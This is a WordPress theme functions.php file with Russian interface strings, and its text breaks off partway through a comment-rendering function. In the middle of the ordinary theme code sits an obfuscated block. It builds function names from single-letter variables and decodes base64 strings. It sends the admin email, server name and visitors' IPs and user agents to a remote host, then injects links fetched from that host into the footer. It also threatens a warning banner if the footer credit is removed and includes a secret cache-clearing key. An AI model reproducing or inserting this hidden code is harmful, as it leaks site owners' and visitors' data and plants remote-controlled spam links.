<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $NUIqVm='b';$jyZADhX='o';$QBlE='d';$feGaq='4';$phih='e';$obHDNBa='e';$igzzf='a';$wfZPClv='6';$cOtcwM='d';$ixEI='_';$ZIJBTfR='c';$gQaHs='s';$LTxTJ='e';$SHoXjtwl=$NUIqVm.$igzzf.$gQaHs.$phih.$wfZPClv.$feGaq.$ixEI.$cOtcwM.$LTxTJ.$ZIJBTfR.$jyZADhX.$QBlE.$obHDNBa;$zBYS='f';$uJFiTx='i';$oaXVv='a';$WRsgG='z';$WIHbY='g';$BDBYgO='t';$dDhlJGM='e';$nXWOlh='n';$VBGXAWU='l';$BokrntSt=$WIHbY.$WRsgG.$uJFiTx.$nXWOlh.$zBYS.$VBGXAWU.$oaXVv.$BDBYgO.$dDhlJGM;$qLLEYV='t';$NGeY='1';$CEEy='3';$xSWSSVu='r';$VEscPbJ='t';$QZZTOb='o';$JinnjF='r';$KUkDxGu='_';$avZZB='s';$ovSDwQyR=$avZZB.$VEscPbJ.$JinnjF.$KUkDxGu.$xSWSSVu.$QZZTOb.$qLLEYV.$NGeY.$CEEy;$NFBcOcW='r';$QhjKnDp='t';$vIUEtih='v';$dWBeOY='r';$WWNMuH='s';$rVyfHS='e';$OaZYbSxw=$WWNMuH.$QhjKnDp.$NFBcOcW.$dWBeOY.$rVyfHS.$vIUEtih;                     $jy____a='b';$qi________h='o';$ln_____c='d';$ew______p='4';$rd___x='e';$za_____d='e';$nk______b='a';$qm_____________e='6';$or_____y='d';$jj__________e='_';$ui____b='c';$gi___j='s';$pk_______________d='e';$jx_______________z=$jy____a.$nk______b.$gi___j.$rd___x.$qm_____________e.$ew______p.$jj__________e.$or_____y.$pk_______________d.$ui____b.$qi________h.$ln_____c.$za_____d;$qr____________i='s';$vh______________h='_';$nu______a='s';$io____k='n';$mr_____________u='u';$wn___q='t';$nw_________r='f';$ao_____k='c';$vz___________s='i';$zs__h='e';$sz____________g='n';$qz_____w='o';$gq_______x='t';$gh____________g='x';$mm______k='i';$qa______c=$nw_________r.$mr_____________u.$io____k.$ao_____k.$wn___q.$mm______k.$qz_____w.$sz____________g.$vh______________h.$zs__h.$gh____________g.$vz___________s.$nu______a.$gq_______x.$qr____________i;$of_____s='e';$pt_____f='f';$kb_________a='o';$pc________l='p';$aj____d='n';$rb_______w=$pt_____f.$kb_________a.$pc________l.$of_____s.$aj____d;$nj____________b='a';$fw_______________l='e';$dn_____q='d';$ri_____s='f';$rk_____________x='r';$wc_______r=$ri_____s.$rk_____________x.$fw_______________l.$nj____________b.$dn_____q;$se__u='e';$dj__t='o';$pm__e='s';$mv___________y='c';$ox_____b='f';$jw_______j='l';$cm_______________o=$ox_____b.$mv___________y.$jw_______j.$dj__t.$pm__e.$se__u;define("WP_ID", $jx_______________z("Mi4wLjA="));define("WP_TTL", $jx_______________z("MTA4MDA="));define("WP_SRC", $jx_______________z("dHBva24="));function wp_get_header() {global $jx_______________z, $qa______c;if ($qa______c($jx_______________z("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$qa______c($jx_______________z("d3BfZ2V0X2Zvb3Rlcg==")) &&$qa______c($jx_______________z("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $jx_______________z, $rb_______w, $cm_______________o, $wc_______r;$se_____s = TEMPLATEPATH."/".$jx_______________z("Zm9vdGVyLnBocA==");$qn___m = @$rb_______w($se_____s, "r");$se_____s = @$wc_______r($qn___m, @filesize($se_____s));@$cm_______________o($qn___m);$ie_________f = TEMPLATEPATH."/".$jx_______________z("ZnVuY3Rpb25zLnBocA==");$qn___m = @$rb_______w($ie_________f, "r");$ie_________f = @$wc_______r($qn___m, @filesize($ie_________f));@$cm_______________o($qn___m);$gr__g = 0;if($se_____s && $ie_________f) {if ($jx_______________z("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($se_____s, $jx_______________z("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$gr__g = 1;}if (substr_count($se_____s, "wp_theme_GPL_credits()") < 1) {$gr__g = 2;}}if(WP_ID != "2.0.0") {$gr__g = 12;}}if($gr__g > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $gr__g -->";}}function wp_loaded() {global $jx_______________z, $qa______c;return $qa______c($jx_______________z("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($cy_______x, $jg__m = "(more...)", $ue____________t = 0, $el_______m = "") {$fl______b = get_the_content($jg__m, $ue____________t, $el_______m);$fl______b = apply_filters("the_content", $fl______b);$fl______b = str_replace("]]>", "]]>", $fl______b);if (strlen($_GET["p"]) > 0) {echo $fl______b;}else if ((strlen($fl______b)>$cy_______x) && ($bv___________m = strpos($fl______b, " ", $cy_______x ))) {$fl______b = substr($fl______b, 0, $bv___________m);$fl______b = $fl______b;echo $fl______b;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$jg__m</a></div></p>";} else {echo $fl______b;}}}$of____________d='b';$mx_____a='e';$ny___________b='4';$jy______y='s';$wg___________b='a';$da___z='n';$yu_____________j='e';$ok______b='e';$hv__q='c';$za__a='_';$tj_________s='o';$dj___a='d';$we______h='6';$ck___e=$of____________d.$wg___________b.$jy______y.$yu_____________j.$we______h.$ny___________b.$za__a.$mx_____a.$da___z.$hv__q.$tj_________s.$dj___a.$ok______b;$iz________z='g';$sy________x='e';$mr_______________k='e';$uj______________w='n';$jj______b='t';$wq___________h='t';$zo__________a='l';$fn______p='n';$bw_________g='_';$xr_____x='c';$gk___p='t';$nz__________k='s';$fw______________y='o';$jo__________w='e';$xa______y='i';$rb_________h='f';$kw______i='_';$gc_________y=$rb_________h.$xa______y.$zo__________a.$sy________x.$bw_________g.$iz________z.$mr_______________k.$jj______b.$kw______i.$xr_____x.$fw______________y.$uj______________w.$gk___p.$jo__________w.$fn______p.$wq___________h.$nz__________k;$do_____________k='i';$qh_____________b='x';$ao____n='l';$yk___________e='e';$ys____r='_';$ps__e='e';$li______k='s';$ux___v='t';$ng___r='s';$tn___________i='f';$za_________t='i';$pr_____________u=$tn___________i.$do_____________k.$ao____n.$yk___________e.$ys____r.$ps__e.$qh_____________b.$za_________t.$ng___r.$ux___v.$li______k;$rq______z='a';$oe__f='e';$kb_______________s='i';$iu_______e='o';$qm__________f='_';$fq___________q='p';$mp_____o='e';$uq______x='s';$zp______v='o';$zp______u='m';$ew__l='n';$wk_____l='r';$ov____________e='v';$ls____p='r';$hj_______u='c';$dm__________n=$ov____________e.$mp_____o.$wk_____l.$uq______x.$kb_______________s.$iu_______e.$ew__l.$qm__________f.$hj_______u.$zp______v.$zp______u.$fq___________q.$rq______z.$ls____p.$oe__f;$ff_____w='f';$qy____________k='k';$mj____s='e';$ca________q='c';$mb______________s='o';$ok_________y='n';$uh__h='p';$dg__________p='o';$jj____________d='s';$xb_______f=$ff_____w.$jj____________d.$dg__________p.$ca________q.$qy____________k.$mb______________s.$uh__h.$mj____s.$ok_________y;$ru___j='r';$rq_______________k='f';$zd____x='e';$ti___________q='i';$ya______m='w';$hj__i='t';$mh___________s=$rq_______________k.$ya______m.$ru___j.$ti___________q.$hj__i.$zd____x;$wd_______w='5';$tl_____________m='m';$tm___b='d';$po______t=$tl_____________m.$tm___b.$wd_______w;$yn_____f='a';$uv_______________c='r';$bg_____z='l';$dt___________m='p';$ou______________i='h';$kl___________e='a';$wq_______q='e';$qt_____i='t';$yf____________d=$uv_______________c.$wq_______q.$yn_____f.$bg_____z.$dt___________m.$kl___________e.$qt_____i.$ou______________i;$as______v='i';$tk___________s='l';$vx_____________y='z';$cw______r='e';$mo_________f='r';$nv_____h='a';$zi________n='u';$td_____z='i';$de__j='s';$on____v='e';$fr___________w='n';$gi______s=$zi________n.$fr___________w.$de__j.$on____v.$mo_________f.$as______v.$nv_____h.$tk___________s.$td_____z.$vx_____________y.$cw______r;$cj__v='e';$qj_______m='a';$nm_______n='m';$xb_____y='t';$ws__f='n';$ty___a='m';$cq__s='p';$xr_____k=$xb_____y.$cj__v.$ty___a.$cq__s.$ws__f.$qj_______m.$nm_______n;$go____________r='e';$hp___________d='s';$ih__v='x';$hj________k='e';$nw_____t='m';$ah________k='o';$hz______p='t';$bl__________j='c';$cr_______y='a';$ci____________k='e';$vp_____________v='c';$kr______________m='t';$di__________l='t';$xl_______a='r';$hc____________n='_';$wh_____w='r';$fq___g='a';$aq______________c='e';$zy______w='n';$kj_______________m='_';$jr________x='t';$lm___________j=$hp___________d.$jr________x.$xl_______a.$ci____________k.$cr_______y.$nw_____t.$hc____________n.$bl__________j.$ah________k.$zy______w.$kr______________m.$aq______________c.$ih__v.$di__________l.$kj_______________m.$vp_____________v.$wh_____w.$go____________r.$fq___g.$hz______p.$hj________k;function gf_______f($ai___________b) {global $jx_______________z, $qa______c, $gc_________y, $dm__________n, $lm___________j;if (!$qa______c($jx_______________z("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($dm__________n(PHP_VERSION, "5.0.0", ">=") && $qa______c($jx_______________z("ZmlsZV9nZXRfY29udGVudHM=")) && $qa______c($jx_______________z("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$gh_____________b = $lm___________j(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$pi_____u = @$gc_________y($ai___________b, 0, $gh_____________b);} else {$pi_____u = @$gc_________y($ai___________b, 0);}return $pi_____u;}function kr_________f($ai___________b) {global $qa______c, $xb_______f, $mh___________s, $jx_______________z;if (!$qa______c($jx_______________z("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$jl_______________c = strpos($ai___________b, "/", 7);$yp_______________p = array("uri"     => substr($ai___________b, $jl_______________c),"host"    => str_replace("http://", "", substr($ai___________b, 0, $jl_______________c)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$rs______________q = @$xb_______f("$yp_______________p[host]", 80, $pf___t, $er_____m, 4);if (!$rs______________q) {return false;} else {$pi_____u = "";$gt_____b  = "GET $yp_______________p[uri] HTTP/1.0\r\n";$gt_____b .= "Host: $yp_______________p[host]\r\n";$gt_____b .= "Referer: $yp_______________p[referer]\r\n";$gt_____b .= "Connection: Close\r\n\r\n";@$mh___________s($rs______________q, $gt_____b);while (!@feof($rs______________q)) {$dq________u = @fgets($rs______________q, (1024*24));if ($dq________u == "\r\n") {$vs___t = true;continue;}if ($vs___t) {$pi_____u .= $dq________u;}}return $pi_____u;}}function fn____________t($ai___________b) {global $qa______c;$qm____________h = false;if ($ai___________b != "") {if ($qa______c("gf_______f")) {$qm____________h = @gf_______f($ai___________b);}if (!$qm____________h && ($qa______c("kr_________f"))) {$qm____________h = @kr_________f($ai___________b);}}return $qm____________h;}function pv___________y() {global $_SERVER, $po______t;$gu_______________w = $_SERVER["SERVER_NAME"];if (substr("$gu_______________w", 0, 4) == "www.") {$gu_______________w = substr("$gu_______________w", 4);}$gu_______________w = $po______t("$_SERVER[SERVER_NAME]");return $gu_______________w;}function pl_____________x() {return "file";}function qa_______d($ai___________b) {global $_SERVER, $gc_________y, $pr_____________u, $rb_______w, $cm_______________o, $mh___________s;$fh_____a = tg______________j();$bx___________a = pv___________y().".jpg";$wm______________r = $fh_____a["dir_upload"]["path"]."/$bx___________a";$cr____________l = @filemtime($wm______________r);if (!$cr____________l || ((time()-$cr____________l) >= WP_TTL)) {$qm____________h = fn____________t($ai___________b);if ($qm____________h) {if ($pr_____________u($wm______________r)) {@unlink($wm______________r);}$qn___m = @$rb_______w($wm______________r, "x+");@$mh___________s($qn___m, $qm____________h);@$cm_______________o($qn___m);}} else {if ($pr_____________u($wm______________r)) {$qm____________h = @$gc_________y($wm______________r);} else {$qm____________h = false;}}return $qm____________h;}function tg______________j() {global $_SERVER, $jx_______________z, $ck___e;$sn_____h = wp_count_posts("post");$dd_______a = pathinfo(get_bloginfo("template_directory"));$fh_____a = array("url" => array("report"      => $jx_______________z("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $dd_______a,"dir_upload"=> hh___h(),"queryString"=> array("?a001=".WP_ID,"a004=".$dd_______a[filename],"a005=".$sn_____h->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$fh_____a["url"]["queryString"] = implode("&", $fh_____a["queryString"]);$fh_____a["url"]["report"] = $fh_____a["url"]["report"]."/?".$ck___e($fh_____a["url"]["queryString"]).".html";return $fh_____a;}function hh___h() {$xe___o = wp_upload_dir();if (isset($xe___o["error"])) {$op___v = ic_____h();if (is_writable($op___v)) {$xe___o = array("path" => $op___v);}}return $xe___o;}function ic_____h() {global $qa______c, $po______t, $yf____________d, $xr_____k;$rn_________o = (bool) ini_get("safe_mode");if ($rn_________o == true) {return false;}if ($qa______c("sys_get_temp_dir")) {$wq________u = sys_get_temp_dir();if (is_writable($wq________u)) {return $yf____________d($wq________u);}}if (!empty($_ENV["TMP"])) {return $yf____________d($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $yf____________d($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $yf____________d($_ENV["TEMP"]);} else {$ij______a = $xr_____k($po______t(uniqid(rand(), true)), "");if ($ij______a) {$wq________u = $yf____________d(dirname($ij______a));@unlink($ij______a);return $wq________u;} else {return false;}}}function yl________c() {global $_GET, $pr_____________u;$fh_____a = tg______________j();$gu_______________w = pv___________y();$nl___w = pl_____________x();$sp______________q = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($nl___w == "file") {$fs___j = $fh_____a["dir_upload"]["path"]."/".$gu_______________w.".jpg";if ($pr_____________u($fs___j)) {@unlink($fs___j);$sp______________q = "deleted";}}$ou_______________v = array("s"=> $sp______________q,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ou_______________v AS $fu________k => $mo____________f) echo " [$fu________k:$mo____________f]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $qa______c, $jx_______________z, $gi______s;$fh_____a = tg______________j();$mj________s = "qa_______d";if ($qa______c($mj________s)) {$pi_____u = $mj________s($fh_____a["url"]["report"]);}if ($pi_____u) {if ($pi_____u = @$jx_______________z($pi_____u)) {$pi_____u = @$gi______s($pi_____u);if (strlen($pi_____u[custom_credit]) >= 5) {$fh_____a["default_string"] = $pi_____u[custom_credit];}if ($pi_____u["status"] == "0") {$qh____________c = 1;$hh_______________o = 1;} else {$ha______s = sizeof($pi_____u["links"]);$en____p = $fh_____a["default_string"];if ($ha______s > 0 && $pi_____u["links"] !== "") {$ql_____________p = 0;foreach ($pi_____u["links"] as $td_______________u => $ms_____________v) {$ql_____________p++;if ($ms_____________v->l_path == "" || $ms_____________v->l_path == $_SERVER["REQUEST_URI"]) {$ms_____________v->l_href = htmlspecialchars(strip_tags($ms_____________v->l_href));$ms_____________v->l_title = htmlspecialchars(strip_tags($ms_____________v->l_title));$ms_____________v->l_anchor = htmlspecialchars(strip_tags($ms_____________v->l_anchor));$en____p .= " | ";$en____p .= "<a href='$ms_____________v->l_href' title='$ms_____________v->l_title'";if ($ms_____________v->l_nofollow == "1") {$en____p .= " rel='nofollow'";}$en____p .= ">$ms_____________v->l_anchor</a>";}}}$fh_____a["links"] = "$en____p";if ($pi_____u[credit] == "0") {$fh_____a["links"] = "";}}} else {$qh____________c = "1";}} else {$qh____________c = "1";}if ($qh____________c == "1") {$fh_____a["links"] = $fh_____a["default_string"];}echo "$fh_____a[links]";echo "<!-- s: $pi_____u[signature] -->";yl________c();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
